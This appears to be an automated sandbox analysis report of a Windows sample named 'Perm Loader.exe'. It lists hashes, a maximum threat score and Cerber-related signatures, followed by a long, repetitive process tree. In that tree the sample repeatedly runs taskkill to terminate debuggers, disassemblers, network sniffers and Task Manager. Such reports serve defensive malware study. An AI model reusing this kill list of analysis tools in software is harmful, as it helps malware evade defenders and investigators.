Analysis
-
max time kernel
27s -
max time network
35s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
07-11-2024 23:13
General
-
Target
Perm Loader.exe
-
Size
1.7MB
-
MD5
367ece01c154d28964a61d30ce83e90c
-
SHA1
d6747c9c2661e40ee186c3a30df24b2546c3720b
-
SHA256
22db2181de7da036ace5cf84dc22422ddb7ed9a267938b3c5484e530a18987e4
-
SHA512
a54c64562eb0bdb4114437fbf70fcf8b4ab6cfb7e1bfef9380db3197951aae51bfd5ea6372fa89ce04ceaca25f52d75ae8d33ef10b24ee8a6311383961d2389b
-
SSDEEP
24576:H7vwe+8ljws5G8Nc9sOgSNMMFJAyAL+3Xw2PP6MReN/IAUqNOmNAFwa/k:HgqdG8Nc9sOxtJVw2nzA3s/
Score
10/10
Malware Config
Signatures
-
Cerber 64 IoCs
Cerber is a widely used ransomware-as-a-service (RaaS), first seen in 2017.
-
Cerber family
-
Executes dropped EXE 20 IoCs
-
Drops file in System32 directory 2 IoCs
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Kills process with taskkill 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 18 IoCs
-
Suspicious behavior: LoadsDriver 20 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 26 IoCs
-
Suspicious use of SendNotifyMessage 24 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Perm Loader.exe"C:\Users\Admin\AppData\Local\Temp\Perm Loader.exe"1⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im KsDumperClient.exe >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /f /im KsDumperClient.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /f /im KsDumper.exe3⤵
- Cerber
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
- Cerber
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im ProcessHacker.exe >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /f /im ProcessHacker.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im idaq.exe >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /f /im idaq.exe3⤵
- Cerber
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im idaq64.exe >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /f /im idaq64.exe3⤵
- Cerber
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Wireshark.exe >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /f /im Wireshark.exe3⤵
- Cerber
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Fiddler.exe >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /f /im Fiddler.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im FiddlerEverywhere.exe >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /f /im FiddlerEverywhere.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Xenos64.exe >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /f /im Xenos64.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Xenos.exe >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /f /im Xenos.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Xenos32.exe >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /f /im Xenos32.exe3⤵
- Cerber
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im de4dot.exe >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /f /im de4dot.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Cheat Engine.exe >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /f /im Cheat Engine.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im cheatengine-x86_64.exe3⤵
- Cerber
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-i386.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im MugenJinFuu-i386.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im cheatengine-x86_64.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-i386.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im cheatengine-i386.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTP Debugger Windows Service (32 bit).exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTP Debugger Windows Service (32 bit).exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im KsDumper.exe3⤵
- Cerber
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im OllyDbg.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im x64dbg.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im x64dbg.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im x32dbg.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im x32dbg.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
- Cerber
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Ida64.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im OllyDbg.exe3⤵
- Cerber
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Dbg64.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Dbg32.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Taskmgr.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Taskmgr.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im KsDumperClient.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im KsDumperClient.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im KsDumper.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im ProcessHacker.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im ProcessHacker.exe3⤵
- Cerber
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im idaq.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im idaq.exe3⤵
- Cerber
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im idaq64.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im idaq64.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Wireshark.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Wireshark.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Fiddler.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Fiddler.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im FiddlerEverywhere.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im FiddlerEverywhere.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Xenos64.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Xenos64.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Xenos.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Xenos.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Xenos32.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Xenos32.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im de4dot.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im de4dot.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Cheat Engine.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Cheat Engine.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im cheatengine-x86_64.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe3⤵
- Cerber
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-i386.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im MugenJinFuu-i386.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im cheatengine-x86_64.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-i386.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im cheatengine-i386.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTP Debugger Windows Service (32 bit).exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTP Debugger Windows Service (32 bit).exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im KsDumper.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im OllyDbg.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im x64dbg.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im x64dbg.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im x32dbg.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im x32dbg.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Ida64.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im OllyDbg.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Dbg64.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Dbg32.exe3⤵
- Cerber
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Taskmgr.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Taskmgr.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im KsDumperClient.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im KsDumperClient.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im KsDumper.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
- Cerber
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im ProcessHacker.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im ProcessHacker.exe3⤵
- Cerber
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im idaq.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im idaq.exe3⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im idaq64.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im idaq64.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Wireshark.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Wireshark.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Fiddler.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Fiddler.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im FiddlerEverywhere.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im FiddlerEverywhere.exe3⤵
- Cerber
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Xenos64.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Xenos64.exe3⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Xenos.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Xenos.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Xenos32.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Xenos32.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im de4dot.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im de4dot.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Cheat Engine.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Cheat Engine.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im cheatengine-x86_64.exe3⤵
- Cerber
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe3⤵
- Cerber
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-i386.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im MugenJinFuu-i386.exe3⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im cheatengine-x86_64.exe3⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-i386.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im cheatengine-i386.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTP Debugger Windows Service (32 bit).exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTP Debugger Windows Service (32 bit).exe3⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im KsDumper.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im OllyDbg.exe3⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im x64dbg.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im x64dbg.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im x32dbg.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im x32dbg.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
-
